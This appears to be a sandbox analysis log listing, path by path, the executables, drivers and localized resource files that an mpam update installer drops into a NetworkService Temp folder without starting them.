Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sq-AL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\mpuxagent.dll.mui Jump to dropped file
